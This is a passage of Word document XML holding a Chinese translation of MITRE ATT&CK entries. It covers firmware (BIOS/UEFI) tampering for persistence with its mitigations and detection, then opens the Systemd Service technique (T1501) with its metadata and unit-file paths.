      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>EFI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>是作为操作系统和计算机硬件之间的软件接口运行的系统固件示例。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220543EF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005E3800" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E3800">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>系统固件（如</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3800">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> BIOS </w:t>
      </w:r>
      <w:r w:rsidRPr="005E3800">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3800">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E3800">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3800">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3800">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3800">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>EFI</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3800">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）是计算机功能的不足，可能被攻击者修改以执行或协助恶意活动。存在覆盖系统固件的功能，这可能为复杂的对手提供安装恶意固件更新的方法，作为在系统上难以检测的持久性手段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0BE33E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2294"/>
        <w:gridCol w:w="7442"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00AF6363" w14:paraId="0ECCE19A" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="46199CF0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5FA66DBD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="37C29323" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64F780AC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>启动</w:t>
            </w:r>
            <w:r>
              <w:t>完整性</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06103B60" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>检查现有</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t xml:space="preserve"> BIOS </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>或</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t xml:space="preserve"> EFI </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>的完整性，以确定它是否容易受到修改。使用受信任的平台模块技术</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="652FCBAA" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E938792" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>特权账户</w:t>
            </w:r>
            <w:r>
              <w:t>管理</w:t>
            </w:r>
            <w:hyperlink r:id="rId83" w:history="1"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CC4CE6C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>阻止攻击者访问特权帐户或执行此技术所需的访问权限</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="20D74A9B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75A52F11" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>更新软件</w:t>
            </w:r>
            <w:hyperlink r:id="rId84" w:history="1"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D0B981C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>根据需要修补</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t xml:space="preserve"> BIOS </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t xml:space="preserve"> EFI</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E55ED61" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00C72AD9" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4180909C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>可能检测到系统固件操作。在易受攻击的系统上转储和检查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> BIOS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>映像，并比较已知良好的图像。</w:t>
      </w:r>
      <w:hyperlink r:id="rId85" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af4"/>
            <w:color w:val="4F7CAC"/>
            <w:vertAlign w:val="superscript"/>
            <w:lang w:val="zh-Hans"/>
          </w:rPr>
          <w:t>[</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>分析差异以确定是否发生了恶意更改。日志尝试读取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>写入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> BIOS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>并比较已知的修补行为。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C387993" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00C72AD9" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>同样，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">EFI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>模块可以收集，并将其与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> EFI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>可执行二进制文件的已知干净列表进行比较，以检测潜在的恶意模块。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">CHIPSEC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>框架可用于分析以确定是否执行了固件修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9CF27E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Systemd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="40D3FB04" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="290F8971" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="001E2A7A" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="001E2A7A">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="001E2A7A">
              <w:t xml:space="preserve"> T1501</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54187A55" w14:textId="76EC32D2" w:rsidR="000F2665" w:rsidRPr="001E2A7A" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="001E2A7A">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001E2A7A">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A19F741" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="001E2A7A" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="001E2A7A">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="001E2A7A">
              <w:t xml:space="preserve"> Linux</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="612F536D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="001E2A7A" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="001E2A7A">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="001E2A7A">
              <w:t xml:space="preserve"> root</w:t>
            </w:r>
            <w:r w:rsidRPr="001E2A7A">
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="001E2A7A">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="001E2A7A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FA05C21" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="001E2A7A" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="001E2A7A">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="001E2A7A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程命令行参数，进程监控，文件监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75FB4E87" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="001E2A7A" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="001E2A7A">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="001E2A7A">
              <w:t>: Tony Lambert, Red Canary</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45008AA7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00641608" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="001E2A7A">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="001E2A7A">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F5193D5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665"/>
    <w:p w14:paraId="17A121E1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>系统服务可用于在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>系统上建立持久性。系统化服务管理器通常用于管理后台守护进程（也称为服务）和其他系统资源。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">Systemd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>是许多</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>发行版上的默认初始化（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>系统，从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Debian 8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>Ubuntu 15.04</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>CentOS 7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>RHEL 7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">Fedora 15 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>开始，并替换了旧式初始化系统，包括</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> SysVinit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Upstart</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>，同时保持向后兼容上述</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> init </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>系统。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9D83DD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="001E2A7A" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E2A7A">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">Systemd </w:t>
      </w:r>
      <w:r w:rsidRPr="001E2A7A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>利用称为服务单元的配置文件来控制服务在什么条件下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>如何</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2A7A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>启动。默认情况下，这些单元文件存储在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>/etc/systemd/system</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2A7A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>/usr/lib/systemd/system</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2A7A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
